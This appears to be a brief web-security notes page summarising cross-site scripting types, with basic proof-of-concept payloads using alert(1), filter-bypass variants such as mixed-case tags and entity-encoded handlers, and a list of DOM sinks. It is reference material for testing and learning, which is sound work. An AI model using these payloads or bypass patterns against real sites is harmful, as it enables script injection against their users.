Notes

Cross-Site Scripting (XSS)

Reflected, stored, and DOM-based XSS — payloads and bypass patterns.

Published
Read time
1 min read
Topics
webxssinjection

Types

  • Reflected — payload in request, echoed in response
  • Stored — payload persisted (DB, log), fired on view
  • DOM — sink written via JavaScript, no server reflection

Basic Payloads

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Filter Bypasses

<ScRiPt>alert(1)</ScRiPt>
<img src=x onerror="&#97;lert(1)">
javas\tcript:alert(1)

DOM Sinks to Look For

innerHTML, document.write, eval, location.href, outerHTML

← Back to Notes